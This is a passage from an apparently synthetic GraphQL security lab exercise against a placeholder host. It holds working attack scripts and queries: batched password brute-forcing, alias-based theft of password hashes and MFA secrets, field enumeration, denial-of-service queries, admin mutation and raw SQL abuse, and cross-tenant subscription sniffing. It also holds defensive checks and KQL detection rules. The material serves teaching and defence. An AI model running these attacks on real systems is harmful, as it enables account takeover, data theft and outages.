  createProject(input)
  updateProject(id, input)
  deleteProject(id)
  uploadFile(projectId, file, metadata)
  deleteFile(id)
  createWebhook(input)
  updateWebhook(id, input)
  deleteWebhook(id)
  updateBilling(userId, input)
  applyDiscount(userId, code)
  impersonateUser(targetUserId)
  resetUserPassword(userId)
  updateTenantConfig(tenantId, config)
  executeQuery(sql)
  clearCache(pattern)

Finding: Administrative Mutations Exposed

The introspection reveals mutations for impersonateUser, resetUserPassword, updateTenantConfig, executeQuery (raw SQL!), and clearCache. These should not be exposed to regular users. This is API5:2023 — Broken Function Level Authorization.
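A saved introspection dump can be triaged by flagging operation names that match high-risk patterns. The sketch below is illustrative only: the pattern list and the `flag_sensitive_operations` helper are assumptions rather than part of the lab tooling, and the inline `sample` stands in for graphql-schema.json.

```python
import re

# Hypothetical name patterns that often indicate admin-only functionality.
RISKY_PATTERNS = [r"impersonate", r"reset.*password", r"execute",
                  r"config", r"cache", r"debug", r"internal"]

def flag_sensitive_operations(schema, root_names=("Query", "Mutation")):
    """Return sorted 'Root.field' names whose field name matches a risky pattern."""
    flagged = []
    for t in schema["data"]["__schema"]["types"]:
        if t.get("name") not in root_names:
            continue
        for field in t.get("fields") or []:
            if any(re.search(p, field["name"], re.IGNORECASE) for p in RISKY_PATTERNS):
                flagged.append(f"{t['name']}.{field['name']}")
    return sorted(flagged)

# Tiny stand-in for the introspection result (SYNTHETIC)
sample = {"data": {"__schema": {"types": [
    {"name": "Query", "fields": [{"name": "me"}, {"name": "debugInfo"}]},
    {"name": "Mutation", "fields": [{"name": "createProject"},
                                    {"name": "executeQuery"},
                                    {"name": "resetUserPassword"}]},
]}}}

print(flag_sensitive_operations(sample))
```

A name match is only a lead: each flagged operation still has to be called with a low-privilege token to confirm whether authorization is enforced.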

Visualize Schema Relationships

# Generate schema visualization data (SYNTHETIC - educational only)
import json

with open('graphql-schema.json', 'r') as f:
    schema = json.load(f)

# Extract type relationships
types = schema['data']['__schema']['types']
object_types = [t for t in types if t['kind'] == 'OBJECT' and not t['name'].startswith('__')]

def named_type(type_ref):
    """Unwrap NON_NULL and LIST wrappers until a named type is reached."""
    while type_ref and not type_ref.get('name'):
        type_ref = type_ref.get('ofType')
    return type_ref['name'] if type_ref else 'Unknown'

print("=== GraphQL Schema Relationships ===\n")
for t in object_types:
    if t.get('fields'):
        print(f"[{t['name']}]")
        for field in t['fields']:
            print(f"  ├── {field['name']}: {named_type(field['type'])}")
        print()

Expected Output (Synthetic):

=== GraphQL Schema Relationships ===

[User]
  ├── id: ID
  ├── username: String
  ├── email: String
  ├── role: String
  ├── tenant: Tenant
  ├── profile: UserProfile
  ├── credentials: UserCredentials
  ├── projects: Project
  ├── apiKeys: ApiKey
  ├── billingAccount: BillingAccount

[UserCredentials]
  ├── passwordHash: String
  ├── mfaSecret: String
  ├── lastPasswordChange: DateTime
  ├── failedLoginAttempts: Int
  ├── accountLocked: Boolean

[Project]
  ├── id: ID
  ├── name: String
  ├── owner: User
  ├── collaborators: User
  ├── files: File
  ├── analytics: ProjectAnalytics
  ├── tenant: Tenant

[Tenant]
  ├── id: ID
  ├── name: String
  ├── config: TenantConfig
  ├── users: User
  ├── projects: Project
  ├── billingAccount: BillingAccount

[DebugInfo]
  ├── databaseUrl: String
  ├── redisUrl: String
  ├── jwtSecret: String
  ├── awsAccessKey: String
  ├── awsSecretKey: String
  ├── environment: String

Step 5.2: Query Depth and Complexity Abuse

Deeply Nested Query Attack

# Test query depth limits with deeply nested relationship traversal
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ me { projects { owner { projects { owner { projects { owner { projects { owner { projects { owner { username } } } } } } } } } } } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "me": {
      "projects": [
        {
          "owner": {
            "projects": [
              {
                "owner": {
                  "projects": [
                    {
                      "owner": {
                        "projects": [
                          {
                            "owner": {
                              "projects": [
                                {
                                  "owner": {
                                    "username": "testuser"
                                  }
                                }
                              ]
                            }
                          }
                        ]
                      }
                    }
                  ]
                }
              }
            ]
          }
        }
      ]
    }
  }
}

Finding: No Query Depth Limit

The GraphQL server processes a query with 10+ levels of nesting without restriction. Each additional level of a circular relationship (User → Projects → Owner → Projects → ...) multiplies the number of resolver calls and database lookups, so the cost grows exponentially with depth and can exhaust server resources. This is API4:2023 — Unrestricted Resource Consumption.
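A depth limit can be approximated before parsing by tracking brace nesting. The sketch below is a rough pre-filter under stated assumptions: `selection_depth` and `check_depth` are hypothetical helpers, input-object braces in arguments are counted as nesting, and fragments are not expanded, so a production server should rely on an AST-based validation rule instead.

```python
def selection_depth(query: str) -> int:
    """Return the deepest brace nesting, ignoring braces inside string literals."""
    depth = max_depth = 0
    in_string = False
    escaped = False
    for ch in query:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
    return max_depth

MAX_DEPTH = 7  # example limit; tune per schema

def check_depth(query: str, limit: int = MAX_DEPTH) -> bool:
    """True when the query stays within the allowed nesting depth."""
    return selection_depth(query) <= limit

nested = ("{ me { projects { owner { projects { owner { projects { owner "
          "{ projects { owner { projects { owner { username } } } } } } } } } } } }")
print(selection_depth(nested), check_depth(nested))
```

Counting braces before parsing keeps the check cheap, which matters because the goal is to reject expensive documents early.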

Complexity-Based Denial of Service

# Generate a query with extreme complexity (SYNTHETIC - educational only)
import requests
import json

# Build a wide query that requests all fields on many types
wide_query = """
{
  users(limit: 1000) {
    id
    username
    email
    role
    profile {
      fullName
      phone
      address
      bio
    }
    credentials {
      passwordHash
      mfaSecret
      lastPasswordChange
      failedLoginAttempts
    }
    projects {
      id
      name
      description
      files {
        id
        filename
        size
        versions {
          id
          uploadedAt
          uploadedBy {
            username
            email
          }
        }
      }
      analytics {
        totalViews
        uniqueVisitors
        averageSessionDuration
      }
      collaborators {
        id
        username
        role
      }
    }
    billingAccount {
      balance
      invoices(limit: 100) {
        id
        amount
        status
        lineItems {
          description
          quantity
          unitPrice
        }
      }
    }
  }
}
"""

response = requests.post(
    "https://graphql.example.com/query",
    headers={
        "Content-Type": "application/json",
        "Authorization": "Bearer SYNTHETIC_TOKEN_HERE"
    },
    json={"query": wide_query},
    timeout=60
)

print(f"Status: {response.status_code}")
print(f"Response size: {len(response.content)} bytes")
print(f"Response time: {response.elapsed.total_seconds()}s")

Expected Output (Synthetic):

Status: 200
Response size: 15728640 bytes    ← ~15MB response
Response time: 23.456s           ← 23+ seconds to process

Finding: No Query Complexity Analysis

The server processed a query requesting 1000 users with all nested relationships, producing a 15MB response in 23 seconds. There is no query complexity limit, cost analysis, or timeout protection. A small number of concurrent complex queries could cause a full denial of service. This is API4:2023 — Unrestricted Resource Consumption.
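The effect of nested list fields on query cost can be shown with a small worst-case estimate. This is a sketch, not the server's cost model: the tree encoding, the `estimate_cost` helper, and the fan-out of 10 items per nested list are all assumptions chosen for illustration; only the `limit: 1000` on users comes from the query above.

```python
def estimate_cost(node) -> int:
    """Worst-case count of resolved values for a selection tree.

    node = {"fields": <number of scalar fields>,
            "children": [(multiplier, child_node), ...]}
    Each child object costs 1 plus its own subtree, times its multiplier.
    """
    total = node.get("fields", 0)
    for multiplier, child in node.get("children", []):
        total += multiplier * (1 + estimate_cost(child))
    return total

# Simplified shape of the wide query (fan-out values are assumptions)
files = {"fields": 3}
projects = {"fields": 3, "children": [(10, files)]}
profile = {"fields": 4}
users = {"fields": 4, "children": [(1, profile), (10, projects)]}
root = {"children": [(1000, users)]}

COMPLEXITY_BUDGET = 1000  # example budget; tune per deployment
cost = estimate_cost(root)
print(f"Estimated cost: {cost} (budget {COMPLEXITY_BUDGET})")
print("REJECT" if cost > COMPLEXITY_BUDGET else "ALLOW")
```

Even with only two nested list levels, the estimate reaches 450,000 resolved values, which is why the budget has to be enforced before execution rather than by timing out afterwards.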

Recursive Fragment Attack (Resource Exhaustion)

# Fragment-based circular reference attack
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "query { me { ...UserFields } } fragment UserFields on User { projects { owner { ...UserFields } } }"
  }' -w "\nTime: %{time_total}s\n"

Expected Output (Synthetic):

Time: 30.000s  ← Request timed out after 30 seconds

Finding: Recursive Fragment Causes Server Hang

A recursive fragment reference (UserFields spreads itself through the owner relationship) causes the server to loop until the request times out, which makes it a denial-of-service vector. The GraphQL specification's validation rules forbid fragment spreads that form cycles, so a compliant server should reject this document during validation, before any resolver runs. This is API4:2023 — Unrestricted Resource Consumption.
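Detecting circular fragment references amounts to finding a cycle in the graph of fragment spreads. The sketch below uses regular expressions instead of a real GraphQL parser, so it ignores string literals and directives on fragment definitions; `fragment_spreads` and `has_fragment_cycle` are hypothetical helper names.

```python
import re

def fragment_spreads(query: str) -> dict:
    """Map each fragment name to the set of fragment names it spreads."""
    graph = {}
    for match in re.finditer(r"fragment\s+(\w+)\s+on\s+\w+\s*\{", query):
        name, start = match.group(1), match.end()
        depth, pos = 1, start
        # Walk forward to the brace that closes this fragment definition
        while pos < len(query) and depth:
            depth += {"{": 1, "}": -1}.get(query[pos], 0)
            pos += 1
        body = query[start:pos]
        # "...Name" is a spread; "... on Type" is an inline fragment and is skipped
        graph[name] = set(re.findall(r"\.\.\.\s*(?!on\b)(\w+)", body))
    return graph

def has_fragment_cycle(query: str) -> bool:
    """Depth-first search for a cycle among fragment spreads."""
    graph = fragment_spreads(query)
    visiting, done = set(), set()

    def visit(name):
        if name in done:
            return False
        if name in visiting:
            return True
        visiting.add(name)
        cyclic = any(visit(n) for n in graph.get(name, ()))
        visiting.discard(name)
        done.add(name)
        return cyclic

    return any(visit(name) for name in graph)

attack = ("query { me { ...UserFields } } "
          "fragment UserFields on User { projects { owner { ...UserFields } } }")
print(has_fragment_cycle(attack))
```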

Step 5.3: Batching Attacks

Authentication Brute-Force via Batching

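# Many GraphQL servers accept a JSON array of operations in a single HTTP request
# (query batching is a server feature, not part of the GraphQL specification)
# Use batching to bypass per-request rate limits on authentication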
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -d '[
    {"query": "mutation { login(username: \"admin\", password: \"password1\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"password2\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"password3\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"letmein\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"admin123\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"REDACTED\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"qwerty\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"welcome1\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"changeme\") { token } }"},
    {"query": "mutation { login(username: \"admin\", password: \"test1234\") { token } }"}
  ]' | jq .

Expected Output (Synthetic):

[
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": {"token": "eyJhbGciOiJSUzI1NiJ9.SYNTHETIC_ADMIN_TOKEN"}}},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]},
  {"data": {"login": null}, "errors": [{"message": "Invalid credentials"}]}
]

Critical Finding: Batching Enables Brute-Force

The GraphQL endpoint processes batch requests with multiple authentication mutations in a single HTTP request. Since rate limiting is applied per-request rather than per-operation, an attacker can send 100-1000 login attempts in each request. This completely bypasses the authentication rate limit of 10/minute. This is API4:2023 — Unrestricted Resource Consumption combined with API2:2023 — Broken Authentication.
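The fix for this class of bypass is to charge the rate limit per operation rather than per HTTP request. The following is a minimal in-memory sketch, assuming a sliding window and a hypothetical `OperationRateLimiter` class; the 10-per-minute default mirrors the limit described above, and a real deployment would typically keep the counters in a shared store.

```python
import json
import time
from collections import defaultdict, deque

class OperationRateLimiter:
    """Sliding-window limiter that charges one unit per GraphQL operation."""

    def __init__(self, limit=10, window_seconds=60, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self.events = defaultdict(deque)  # client key -> timestamps of charged operations

    def allow(self, client_key: str, raw_body: str) -> bool:
        payload = json.loads(raw_body)
        # An array body is a batch: every element counts as one operation
        operations = len(payload) if isinstance(payload, list) else 1
        now = self.clock()
        window = self.events[client_key]
        while window and now - window[0] >= self.window:
            window.popleft()
        if len(window) + operations > self.limit:
            return False  # reject the whole request; nothing is charged
        window.extend([now] * operations)
        return True

limiter = OperationRateLimiter(limit=10, window_seconds=60)
batch = json.dumps([{"query": "mutation { login }"}] * 100)
print(limiter.allow("203.0.113.77", batch))  # a 100-operation batch exceeds the limit
```

Aliased fields inside a single operation are not counted by this sketch and need a separate check.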

Large-Scale Batching Script

# Batched brute-force via GraphQL (SYNTHETIC - educational only)
import requests
import json

GRAPHQL_URL = "https://graphql.example.com/query"
TARGET_USER = "admin"
BATCH_SIZE = 100

# Load wordlist (SYNTHETIC)
passwords = [
    "password", "password1", "123456", "admin", "letmein",
    "welcome", "monkey", "dragon", "master", "qwerty",
    "REDACTED", "changeme", "test1234", "admin123", "root",
    # ... truncated for brevity — in practice, thousands of passwords
]

def batch_login(usernames_passwords, batch_num):
    """Send a batch of login mutations."""
    queries = []
    for username, password in usernames_passwords:
        # json.dumps escapes quotes and backslashes so the values stay valid string literals
        queries.append({
            "query": f'mutation {{ login(username: {json.dumps(username)}, password: {json.dumps(password)}) {{ token }} }}',
            "operationName": None,
            "variables": None
        })

    response = requests.post(
        GRAPHQL_URL,
        headers={"Content-Type": "application/json"},
        json=queries,
        timeout=30
    )

    results = response.json()
    for i, result in enumerate(results):
        # "login" is null on a failed attempt, so guard before reading the token
        login = (result.get("data") or {}).get("login") or {}
        if login.get("token"):
            username, password = usernames_passwords[i]
            print(f"\n[!!!] CREDENTIAL FOUND in batch {batch_num}:")
            print(f"      Username: {username}")
            print(f"      Password: {'*' * len(password)}")  # Don't print actual password
            return True

    return False

# Process in batches
print(f"[*] Target: {TARGET_USER}")
print(f"[*] Passwords: {len(passwords)}")
print(f"[*] Batch size: {BATCH_SIZE}")
print(f"[*] Total requests: {-(-len(passwords) // BATCH_SIZE)}")  # ceiling division

for batch_start in range(0, len(passwords), BATCH_SIZE):
    batch = [(TARGET_USER, p) for p in passwords[batch_start:batch_start + BATCH_SIZE]]
    batch_num = batch_start // BATCH_SIZE + 1
    print(f"[*] Sending batch {batch_num} ({len(batch)} attempts)...", end=" ", flush=True)

    found = batch_login(batch, batch_num)
    if found:
        break
    print("No match")

Aliased Query Batching

# Use aliases to batch multiple operations within a single query
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ u1: user(id: \"user-1001\") { username email role credentials { passwordHash mfaSecret } } u2: user(id: \"user-1002\") { username email role credentials { passwordHash mfaSecret } } u3: user(id: \"user-1003\") { username email role credentials { passwordHash mfaSecret } } u4: user(id: \"user-9001\") { username email role credentials { passwordHash mfaSecret } } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "u1": {
      "username": "testuser",
      "email": "testuser@example.com",
      "role": "user",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_HASH_1",
        "mfaSecret": "JBSWY3DPEHPK3PXP"
      }
    },
    "u2": {
      "username": "jane.smith",
      "email": "jane.smith@example.com",
      "role": "user",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_HASH_2",
        "mfaSecret": "KRSXG5DJMFWXA4TP"
      }
    },
    "u3": {
      "username": "bob.wilson",
      "email": "bob.wilson@example.com",
      "role": "user",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_HASH_3",
        "mfaSecret": "NZSWYZLONFQWS3TP"
      }
    },
    "u4": {
      "username": "admin",
      "email": "admin@novatech.example.com",
      "role": "admin",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_ADMIN_HASH",
        "mfaSecret": "GEZDGNBVGY3TQOJQ"
      }
    }
  }
}

Critical Finding: Aliased Batch Data Extraction

Using GraphQL aliases, an attacker can query multiple users' sensitive data in a single request. This bypasses per-query rate limiting and extracts password hashes and MFA secrets for all users. Combined with the lack of authorization on the credentials field, this enables complete credential theft. This is both API1:2023 — Broken Object Level Authorization and API3:2023 — Broken Object Property Level Authorization.
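Alias-based batching can be flagged by counting how often the same field is requested under different aliases. The sketch below is a heuristic under stated assumptions: `count_aliased_fields` is a hypothetical helper, it only recognizes aliased fields that take arguments or a selection set, and a robust implementation would walk the parsed query AST.

```python
import re

STRING_LITERAL = re.compile(r'"(?:\\.|[^"\\])*"')
# alias: field followed by "(" (arguments) or "{" (selection set)
ALIAS = re.compile(r"\b(\w+)\s*:\s*(\w+)\s*[({]")

def count_aliased_fields(query: str) -> dict:
    """Count how many times each field is requested under an alias."""
    stripped = STRING_LITERAL.sub('""', query)  # ignore anything inside strings
    counts = {}
    for _alias, field in ALIAS.findall(stripped):
        counts[field] = counts.get(field, 0) + 1
    return counts

MAX_ALIASES_PER_FIELD = 3  # hypothetical threshold

query = ('{ u1: user(id: "user-1001") { username } '
         'u2: user(id: "user-1002") { username } '
         'u3: user(id: "user-1003") { username } '
         'u4: user(id: "user-9001") { username } }')
counts = count_aliased_fields(query)
print(counts, any(n > MAX_ALIASES_PER_FIELD for n in counts.values()))
```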

Step 5.4: Field Suggestion Exploitation

Enumerate Fields via Suggestions (No Introspection Needed)

# Even if introspection is disabled, GraphQL servers often suggest field names
# Test with intentionally misspelled field names
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ me { passwor } }"
  }' | jq '.errors[0].message'

Expected Output (Synthetic):

"Cannot query field \"passwor\" on type \"User\". Did you mean \"passwordHash\", \"passwordResetToken\", or \"passwordChangedAt\"?"

# Enumerate more fields through suggestions
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ me { secre } }"
  }' | jq '.errors[0].message'

Expected Output (Synthetic):

"Cannot query field \"secre\" on type \"User\". Did you mean \"secretKey\", \"securityQuestions\", or \"secretApiToken\"?"

Automated Field Enumeration via Suggestions

# Automated field enumeration using suggestions (SYNTHETIC - educational only)
import requests
import json
import re

GRAPHQL_URL = "https://graphql.example.com/query"
HEADERS = {
    "Content-Type": "application/json",
    "Authorization": "Bearer SYNTHETIC_TOKEN_HERE"
}

# Prefixes to test for field enumeration
prefixes = [
    "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
    "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
    "pass", "secret", "token", "key", "admin", "internal", "debug",
    "config", "credential", "hash", "mfa", "otp", "session", "role",
    "permission", "billing", "credit", "ssn", "tax"
]

discovered_fields = set()

for prefix in prefixes:
    query = f'{{ me {{ {prefix}XXXXXX }} }}'
    response = requests.post(
        GRAPHQL_URL,
        headers=HEADERS,
        json={"query": query},
        timeout=30
    )

    result = response.json()
    errors = result.get("errors", [])

    for error in errors:
        message = error.get("message", "")
        # Extract every quoted name that follows "Did you mean", not just the first
        hint = message.partition("Did you mean")[2]
        suggestions = re.findall(r'"([^"]+)"', hint)
        for suggestion in suggestions:
            if suggestion not in discovered_fields:
                discovered_fields.add(suggestion)
                print(f"[+] Discovered field: {suggestion} (from prefix: {prefix})")

print(f"\n[*] Total fields discovered: {len(discovered_fields)}")
print(f"[*] Fields: {sorted(discovered_fields)}")

Expected Output (Synthetic):

[+] Discovered field: address (from prefix: a)
[+] Discovered field: apiKeys (from prefix: a)
[+] Discovered field: adminNotes (from prefix: a)
[+] Discovered field: billingAccount (from prefix: b)
[+] Discovered field: credentials (from prefix: c)
[+] Discovered field: configOverrides (from prefix: c)
[+] Discovered field: debugMode (from prefix: d)
[+] Discovered field: email (from prefix: e)
[+] Discovered field: hashAlgorithm (from prefix: h)
[+] Discovered field: internalId (from prefix: i)
[+] Discovered field: mfaSecret (from prefix: m)
[+] Discovered field: passwordHash (from prefix: pass)
[+] Discovered field: passwordResetToken (from prefix: pass)
[+] Discovered field: passwordChangedAt (from prefix: pass)
[+] Discovered field: role (from prefix: r)
[+] Discovered field: secretKey (from prefix: secret)
[+] Discovered field: secretApiToken (from prefix: secret)
[+] Discovered field: securityQuestions (from prefix: secret)
[+] Discovered field: sessionTokens (from prefix: session)
[+] Discovered field: ssnEncrypted (from prefix: ssn)
[+] Discovered field: tenant (from prefix: t)
[+] Discovered field: tokenExpiry (from prefix: token)

[*] Total fields discovered: 22
[*] Fields: ['address', 'adminNotes', 'apiKeys', 'billingAccount', 'configOverrides', 'credentials', 'debugMode', 'email', 'hashAlgorithm', 'internalId', 'mfaSecret', 'passwordChangedAt', 'passwordHash', 'passwordResetToken', 'role', 'secretApiToken', 'secretKey', 'securityQuestions', 'sessionTokens', 'ssnEncrypted', 'tenant', 'tokenExpiry']

Finding: Field Suggestions Leak Schema

Even without introspection, the GraphQL server's field suggestion feature reveals sensitive field names including passwordHash, mfaSecret, secretApiToken, ssnEncrypted, and passwordResetToken. This is API8:2023 — Security Misconfiguration — the suggestion feature should be disabled in production.
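Where the GraphQL server library offers no switch for suggestions, the hints can be stripped from error messages before the response leaves the server. The sketch below assumes the "Did you mean ...?" wording shown in the outputs above; `strip_suggestions` is a hypothetical helper, not a library function.

```python
import re

# Matches the trailing hint, e.g. ' Did you mean "passwordHash", or "x"?'
SUGGESTION = re.compile(r"\s*Did you mean .*\?$")

def strip_suggestions(response: dict) -> dict:
    """Return a copy of a GraphQL response with suggestion hints removed."""
    if "errors" not in response:
        return response
    cleaned = dict(response)
    cleaned["errors"] = [
        {**err, "message": SUGGESTION.sub("", err.get("message", ""))}
        for err in response["errors"]
    ]
    return cleaned

raw = {"errors": [{"message": 'Cannot query field "passwor" on type "User". '
                              'Did you mean "passwordHash", "passwordResetToken", '
                              'or "passwordChangedAt"?'}]}
print(strip_suggestions(raw)["errors"][0]["message"])
```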

Step 5.5: GraphQL Authorization Bypass

Test Resolver-Level Authorization

# Test if the user resolver enforces authorization on sensitive fields
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ user(id: \"user-9001\") { username role credentials { passwordHash mfaSecret } } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "user": {
      "username": "admin",
      "role": "admin",
      "credentials": {
        "passwordHash": "$2b$12$SYNTHETIC_ADMIN_HASH",
        "mfaSecret": "GEZDGNBVGY3TQOJQ"
      }
    }
  }
}

Critical Finding: No Field-Level Authorization

A standard user can query the admin's password hash and MFA secret through the GraphQL API. The resolvers do not implement field-level authorization: any authenticated user can access any field on any object. This is API1:2023 — Broken Object Level Authorization, compounded by API3:2023 — Broken Object Property Level Authorization for the exposed credentials fields.
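Field-level authorization can be expressed as a policy lookup that runs before a resolver returns each field. The sketch below is a simplified illustration: the `FIELD_POLICY` table, the role names, and the `can_read_field` and `filter_fields` helpers are assumptions, and object-level checks (tenant, ownership) would still be needed alongside it.

```python
# Hypothetical policy: (type name, field name) -> roles allowed to read the field.
# An empty set means the field is never returned through the API.
FIELD_POLICY = {
    ("User", "credentials"): {"admin"},
    ("UserCredentials", "passwordHash"): set(),
    ("UserCredentials", "mfaSecret"): set(),
}

def can_read_field(viewer: dict, type_name: str, field_name: str) -> bool:
    """Check the viewer's role against the policy for one field."""
    allowed_roles = FIELD_POLICY.get((type_name, field_name))
    if allowed_roles is None:
        return True  # unlisted fields are left to object-level checks
    return viewer.get("role") in allowed_roles

def filter_fields(viewer: dict, type_name: str, obj: dict) -> dict:
    """Drop every field the viewer is not allowed to read."""
    return {k: v for k, v in obj.items() if can_read_field(viewer, type_name, k)}

record = {"username": "admin", "role": "admin",
          "credentials": {"passwordHash": "REDACTED", "mfaSecret": "REDACTED"}}
print(filter_fields({"role": "user"}, "User", record))
```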

Test Mutation Authorization

# Test if standard user can execute admin-only mutations
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "mutation { updateTenantConfig(tenantId: \"tenant-001\", config: { maxUsers: 999999, features: [\"unlimited_storage\", \"api_access\", \"admin_panel\"] }) { id config { maxUsers features } } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "updateTenantConfig": {
      "id": "tenant-001",
      "config": {
        "maxUsers": 999999,
        "features": ["unlimited_storage", "api_access", "admin_panel"]
      }
    }
  }
}

Finding: Mutation Authorization Bypass

A standard user can modify tenant configuration through the updateTenantConfig mutation, which should be restricted to platform administrators. This enables self-provisioning of unlimited users, storage, and admin panel access. This is API5:2023 — Broken Function Level Authorization.

Execute Raw SQL via GraphQL Mutation

# Test the executeQuery mutation (discovered via introspection)
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "mutation { executeQuery(sql: \"SELECT username, email, role FROM users LIMIT 5\") { rows columns } }"
  }' | jq .

Expected Output (Synthetic):

{
  "data": {
    "executeQuery": {
      "columns": ["username", "email", "role"],
      "rows": [
        ["testuser", "testuser@example.com", "user"],
        ["jane.smith", "jane.smith@example.com", "user"],
        ["bob.wilson", "bob.wilson@example.com", "user"],
        ["admin", "admin@novatech.example.com", "admin"],
        ["svc-analytics", "svc@novatech.example.com", "service"]
      ]
    }
  }
}

Critical Finding: Raw SQL Execution via GraphQL

The executeQuery mutation allows any authenticated user to execute arbitrary SQL queries against the database. This provides complete database access including data extraction, modification, and potential OS-level command execution via database functions. This is the most severe finding in the assessment — it combines API5:2023, API8:2023, and essentially provides full database compromise.

Step 5.6: GraphQL Subscription Abuse

# Test for WebSocket-based subscription sniffing
# GraphQL subscriptions use WebSocket protocol

# Check if subscriptions are available
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{
    "query": "{ __schema { subscriptionType { fields { name description args { name type { name } } } } } }"
  }' | jq '.data.__schema.subscriptionType.fields[] | {name, args: [.args[].name]}'

Expected Output (Synthetic):

{
  "name": "auditEvents",
  "args": ["tenantId"]
}
{
  "name": "fileChanges",
  "args": ["projectId"]
}
{
  "name": "userActivity",
  "args": ["userId"]
}
{
  "name": "systemAlerts",
  "args": []
}

# Subscribe to audit events across tenants (SYNTHETIC - educational only)
import asyncio
import websockets
import json

async def subscribe_audit():
    """Subscribe to audit events for another tenant."""
    uri = "wss://graphql.example.com/ws"

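    async with websockets.connect(
        uri,
        # The "subscribe"/"next" message types belong to the graphql-transport-ws subprotocol
        subprotocols=["graphql-transport-ws"],
        # Note: websockets >= 14 names this parameter additional_headers
        extra_headers={"Authorization": "Bearer SYNTHETIC_TOKEN_HERE"}
    ) as websocket:
        # Initialize the connection and wait for the server's acknowledgement
        init_msg = json.dumps({
            "type": "connection_init",
            "payload": {"Authorization": "Bearer SYNTHETIC_TOKEN_HERE"}
        })
        await websocket.send(init_msg)
        ack = json.loads(await websocket.recv())
        if ack.get("type") != "connection_ack":
            raise RuntimeError(f"Connection not acknowledged: {ack}")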

        # Subscribe to tenant-002's audit events (cross-tenant)
        subscribe_msg = json.dumps({
            "id": "1",
            "type": "subscribe",
            "payload": {
                "query": """
                    subscription {
                        auditEvents(tenantId: "tenant-002") {
                            timestamp
                            userId
                            action
                            resource
                            details
                            ipAddress
                        }
                    }
                """
            }
        })
        await websocket.send(subscribe_msg)

        # Listen for events
        print("[*] Listening for tenant-002 audit events...")
        while True:
            response = await websocket.recv()
            event = json.loads(response)
            if event.get("type") == "next":
                data = event["payload"]["data"]["auditEvents"]
                print(f"[+] Event: {data['action']} by {data['userId']}")
                print(f"    Resource: {data['resource']}")
                print(f"    IP: {data['ipAddress']}")
                print(f"    Time: {data['timestamp']}")
                print()

asyncio.run(subscribe_audit())

Detection & Defense — Exercise 5

KQL Detection: GraphQL Introspection

// Detect GraphQL introspection queries
ApiAccessLog
| where TimeGenerated > ago(1h)
| where URL has "graphql" or URL has "/query"
| where RequestBody has "__schema" or RequestBody has "__type" or RequestBody has "introspectionQuery"
| project TimeGenerated, ClientIP, URL, UserAgent, StatusCode
| summarize IntrospectionAttempts = count() by ClientIP, bin(TimeGenerated, 5m)
| where IntrospectionAttempts > 0

KQL Detection: GraphQL Batching Attacks

// Detect GraphQL batching attacks
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL has "graphql" or URL has "/query"
| where RequestBody startswith "["  // Array = batch request
| extend BatchSize = countof(RequestBody, '"query"')
| where BatchSize > 5
| project TimeGenerated, ClientIP, URL, BatchSize, StatusCode
| summarize
    TotalBatches = count(),
    MaxBatchSize = max(BatchSize),
    TotalOperations = sum(BatchSize)
    by ClientIP, bin(TimeGenerated, 5m)
| where TotalOperations > 50

KQL Detection: Deep/Complex Query Abuse

// Detect overly complex GraphQL queries
ApiAccessLog
| where TimeGenerated > ago(1h)
| where URL has "graphql" or URL has "/query"
| extend QueryDepth = countof(RequestBody, "{")  // total brace count, a rough proxy for nesting depth
| extend QueryLength = strlen(RequestBody)
| extend ResponseTime_ms = ResponseTime
